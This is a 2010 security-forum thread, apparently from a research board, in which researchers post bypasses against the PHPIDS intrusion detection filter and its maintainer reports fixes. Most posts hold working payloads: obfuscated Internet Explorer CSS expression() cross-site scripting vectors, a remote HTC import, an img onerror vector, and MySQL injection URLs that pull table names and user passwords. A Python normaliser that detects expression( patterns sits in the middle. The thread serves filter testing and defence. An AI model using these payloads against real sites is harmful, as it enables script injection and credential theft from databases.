Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: April 19, 2010 04:51PM

One slash off, sorry I didn't have time to make it executable. IE7 or IE8 compat IE7

<div style=x=expressio\n(scripts.item(0).src&nbsp;=&nbsp;&nbsp;alt&nbsp;) alt=/0x.lv>

Challenge can you get the extra slash....

or maybe get a "a":-
<div style=x=expressio\n(scripts.item(0).text&nbsp;=&nbsp;&nbsp;alt&nbsp;) alt=lert(1) title=a>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 19, 2010 05:18PM

Omg - awesome stuff! I had something of my own to add but fixed it silently. I will add the rest of the fixes on Saturday - this week is pretty busy but I do care and will take care of those - thx and very much appreciated! Here's my jizz btw - IE8 is quite awesome inside style attributes when replacing delimiters with exclamation marks - not sure yet why but will put some research into it as soon as I find the time

<div>
<style>*{background:url('a\'!!!x:expression(write(1))}</style>
</div>

<div style=background:url('a\'!!!x:expression(write(1));')></div>

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 19, 2010 05:21PM

@Gareth now the = trick is public - what hast thou done :D

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 19, 2010 10:50PM

So, guys, what do we have at the moment?

All of these work (tested in IE 8).

1. Symbol !

<div style="background:url('a'!!!x:expression(write(1));"></div> // invalid property background

<div style="background:url('a'!;x:expression(write(1));"></div> // invalid property background

<div style="background:url('a')!!x:expression(write(1));"></div> // valid property background

Conclusion: ! is equivalent to ( or ) as a url property breaker. !! is a property separator (equivalent to ;).

2. Symbol }

Go Next --> (look at my vector before).

<div style="background:url('a')}x:expression(write(1));"></div> // valid property background
<div style="background:url('a'}}x:expression(write(1));"></div> // invalid property background
<div style="background:url{'a'}}x:expression(write(1));"></div> // invalid property background

Conclusion: } is a url property breaker and a property separator (equivalent to ;).

3. Symbols ",'

Go Next --> http://sla.ckers.org/forum/read.php?2,29779,page=2

<div style="background:url('a'';x:expression(write(1));"></div> // invalid property background


Conclusion: ' is equivalent to ( or ) only as a url property breaker, and is not a property separator.

This is very very beautiful, guys!

LeverOne

----------------------
~Veritas~



Edited 4 time(s). Last edit at 04/20/2010 05:55AM by LeverOne.

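The observations in LeverOne's post above point to one defensive rule: match on what the CSS engine will actually execute, not on the raw attribute text. The following Python is an added example, not PHPIDS code and not from any poster in this thread. It folds the tricks seen on this page (HTML entities such as &nbsp;, /* */ comments, hex escapes like \28, character escapes like \n and \') into a normaliser and then looks for expression( in each declaration. The separator set (; plus } and runs of !) is an assumption taken from the IE8 findings posted here, not from the CSS grammar; the sample values are the vectors posted above with the surrounding tag removed, and the benign line is constructed.

```python
from __future__ import annotations

import html
import re

# /* ... */ comments; an unterminated comment swallows the rest of the value.
_COMMENT = re.compile(r'/\*.*?(?:\*/|$)', re.DOTALL)
# One pass for both escape forms, so a character produced by a hex escape is
# never re-interpreted as the start of a second escape:
#   \28   -> '('  (backslash, 1-6 hex digits, one optional trailing whitespace)
#   \n    -> 'n', \' -> "'", \( -> '('  (backslash plus any other character)
_ESCAPE = re.compile(r'\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|(.))', re.DOTALL)
# Declaration separators as observed in IE8 in this thread (assumption: ';'
# is standard, '}' and runs of '!' are the forum's empirical findings).
_SEPARATOR = re.compile(r';|\}|!{2,}')
_EXPRESSION = re.compile(r'expression\s*\(', re.IGNORECASE)


def _unescape(match: re.Match) -> str:
    if match.group(1) is not None:
        code = int(match.group(1), 16)
        return chr(code) if 0 < code <= 0x10FFFF else '\ufffd'
    return match.group(2)


def normalize_style(value: str) -> str:
    """Reduce a style attribute value to the text the CSS engine acts on."""
    value = html.unescape(value)      # &nbsp; -> U+00A0, &#40; -> '('
    value = _COMMENT.sub('', value)   # exp/*x*/ression -> expression
    return _ESCAPE.sub(_unescape, value)


def declarations(value: str) -> list[str]:
    """Split a normalized value the way the thread reports IE8 doing it."""
    return [p.strip() for p in _SEPARATOR.split(value) if p.strip()]


def flagged_declarations(raw_value: str) -> list[str]:
    """Declarations that still contain expression( after normalization."""
    return [d for d in declarations(normalize_style(raw_value))
            if _EXPRESSION.search(d)]


# Vectors posted in this thread, with the surrounding <div ...> tag removed;
# the last line is a constructed benign control.
SAMPLES = [
    r"x=expressio\n(scripts.item(0).src&nbsp;=&nbsp;&nbsp;alt&nbsp;)",
    r"background:url('a\'!!!x:expression(write(1));",
    r"color:white;>;lo:expression\28\77rite\28 1\29\29;",
    r"exp\r/*expr\*/essio\n(!!!write(2))!!!",
    "background:url('a.png');color:red",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), "->", flagged_declarations(sample))
```

The point of normalising before matching is exactly what the PHPIDS maintainer describes later in this thread: remove the patterns before the string diff runs. The splitter is deliberately over-inclusive (it treats every separator the thread found as a boundary), which is the safe direction for a detector, since an extra split can only expose a declaration, never hide one.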
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: April 20, 2010 01:50AM

@mario

Hehe it was public long ago :)
<////////////////style========xss=expression(window.x?0:(alert(/XSS/),window.x=1))>

http://www.businessinfo.co.uk/labs/talk/xsstalk.zip

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 20, 2010 05:38AM

@Gareth there's public and there's public ;)

@LeverOne - just to catch up - I put this one on Twitter yesterday night:

</*\/style=!!!\*/-!!!=exp\r/*expr\*/essio\n(!!!write(2))!!!<> Time to go to bed!!/**/!

Any chance to see you there? Not sure if u have an account/use it already. Would be awesome!

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: April 20, 2010 06:00AM

@mario

I blame sdc:-
http://sla.ckers.org/forum/read.php?12,33287,34204,page=2#msg-34076

I knew I shouldn't have sent him my pres :)

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 20, 2010 07:18AM

@mario
Yep, breaking URL properties is not the only possible function of the symbol "!". Your vector proves that this character does not break the expression. But breaking out of url and delimiting properties via "!" is your great discovery.
This discovery, together with mine and Gareth's, "rules the world now". :)

Twitter ... When I have inspiration, I'll be there and let you know. But I'm afraid to follow 1337 sources of information.

LeverOne




Edited 1 time(s). Last edit at 04/20/2010 07:18AM by LeverOne.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: April 20, 2010 07:54AM

@LeverOne

Actually url breakers work without "!" try any alphanumeric character after a quote ;)

Who are you? Me and mario are nosey :P blog or twitter c'mon

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 20, 2010 08:31AM

@Gareth

Quote

> Actually url breakers work without "!" try any
> alphanumeric character after a quote ;)

+1, many characters (not only alnum)
<div style="background:url('a'(!!x:expression(write(1));"></div>

Quote

> Who are you? Me and mario are nosey :P
Okay, I confess... I'm... I'm... Batman... o_O

Quote

> blog or twitter c'mon
Later, Saturday.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 20, 2010 08:34AM

Yep - confirmed

<style>*{font-family=`!/a:expression(write(1))!'<b>

Batman. I knew it. @Gareth see - I told you all the time but nooo - cannot be u said :P

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: April 20, 2010 08:47AM

nanananannanannananannannana



Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 23, 2010 08:26PM

lo=/,Batman/,alert('Batman flew here')



@thornmaker, thanks, originally i meant this.




Edited 2 time(s). Last edit at 04/24/2010 07:51AM by LeverOne.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: thornmaker
Date: April 23, 2010 10:50PM

@LeverOne nice one! except... s/;//g

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 24, 2010 08:59AM

// in xss.htc --> TAGNAME="*"

<?xml:namespace prefix=xss><?import namespace=xss implementation=http://ha.ckers.org/xss.htc><xss:*>lo</xss:*>

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 24, 2010 10:47AM

Nice ones! All fixed - plus some new features like wildcard extensions. Thx

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 24, 2010 12:16PM

Quote

> All fixed

Not yet. :)

For pages without "Doctype" ("\" ignored):
<a style="background:url(//mh.mh/\)!*mh:expression\(write\(1\));">lo</a> // you discovered

and look: http://sla.ckers.org/forum/read.php?12,30425,page=28#msg-34198




Edited 1 time(s). Last edit at 04/24/2010 12:22PM by LeverOne.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 25, 2010 07:50AM

FF & IE

<img src=http://lo.lo/lo = '> ' onerror=alert(1)//

PHPIDS is good already, but will be even better.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 25, 2010 09:37AM

Phew - those were both tough ones! Again the problem "HTMLPurifier bypass === PHPIDS HTML mode bypass". I added fixes and tests - although I think they might not be perfect and reek a bit. The challenge was to detect patterns in the Purifier bypasses and eliminate them before the actual string diff happens in the PHPIDS. Fixed for now :)

Thanks!

Ah - I wrote Edward two mails about the bypasses - let's see what happens - I hope to be able to get rid of the specific fixes asap :D

Awesome stuff, LeverOne! Plain incredible

This one was headache generator number one :)
<a style=background:url(/\)!@x:expression\(write\(1\));></a>

Ah and HTMLawed seems bypassable too with this trick. It's maintained by patnaik from this board - right?

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 25, 2010 10:26AM

100500 filters are bypassable with this and other tricks. Let the authors have their fingers on the pulse of events.




Edited 1 time(s). Last edit at 04/25/2010 10:41AM by LeverOne.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 26, 2010 10:40AM

Becoming harder and harder ... :)

<div style="color:white;>;lo:expression\28\77rite\28 1\29\29;




Edited 1 time(s). Last edit at 04/26/2010 10:41AM by LeverOne.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: April 26, 2010 11:13AM

@LeverOne

I say you switch off the checkbox and take it up a notch :)




Edited 1 time(s). Last edit at 04/26/2010 11:13AM by Gareth Heyes.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: April 29, 2010 02:55AM

Just read that there are more whitespace characters working on MySQL. I wonder why my script did not detect them, because I brute-forced them all. However, if they work (could not test yet), here we go:

http://demo.php-ids.org/?test=%27sounds%20like%281%29%20union%19%28select%191,group_concat%28table_name%29,3%19from%19information_schema.%60tables%60%29%23%28
http://demo.php-ids.org/?test=%27sounds%20like%281%29union%19select%191,group_concat%28column_name%29,3%19from%19information_schema.%60columns%60where%28table_name%29=0x7573657273%23
http://demo.php-ids.org/?test=Text%27sounds%20like%281%29%20union%19%28select%19id,user,pass%19from%60users%60%29%23%28Text

Impact: 0

other whitespaces around %01-%0b are detected by the "dangerous characters" rule.

edit:
Now tested on MySQL 5.1.36, and %01, %02, ... %19 do not work. Maybe I translated the article wrongly? However, they use them in their sample injections.



Edited 2 time(s). Last edit at 04/29/2010 10:02AM by Reiners.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: May 01, 2010 08:08AM

@Reiners:
Quote

> I Have @ Reiners wrote an email to you:)
What did he say? I can't get it running either - on all tested DBMS. Nevertheless I added some of the mentioned characters to the "evil characters" array. One never knows :)

@LeverOne I fixed the vector - thanks to the (not perfect yet) release of HTMLPurifier 4.1.0 I could remove several of the regexes we had to develop the recent days and weeks. Awesome work!

Thanks a lot!

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: May 01, 2010 11:19AM

it works on his setup, we are working on finding out what is causing the difference. But yes, you should add them to the filter list ;)

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: May 07, 2010 04:54AM

no news yet about the "evil characters".
meantime a simple 1 or 1=1

http://demo.php-ids.org/?test=0'like(0)%20and%201%20sounds%20like%20(@a)%20or%20true%231

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: May 09, 2010 01:11PM

By accident the author only tested the "evil characters" between "-- -" as a whitespace alternative. They don't work in the query itself.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: May 09, 2010 02:35PM

@Reiners haha okay - too (bad|good) - all fixed btw - thanks!

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: lightos
Date: May 18, 2010 08:15PM

Progression of a bypass:
2a'-1^ ' 0
2a'-1^ ' 0' and '' like '
2a'-1^ ' 0' and (select 1) rlike '1
2a'-1^ ' 0' and (select`user`from`mysql`.user limit 1) rlike 'root
2a'-1^ ' 0' and (select mid(user,1 /1,1/ 1)from`mysql`.user limit 1) rlike 'r

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: June 29, 2010 02:37PM

0'rlike(0)and 1 rlike (@a)or true - ' 0

see you on thursday!



Edited 1 time(s). Last edit at 06/29/2010 02:38PM by Reiners.
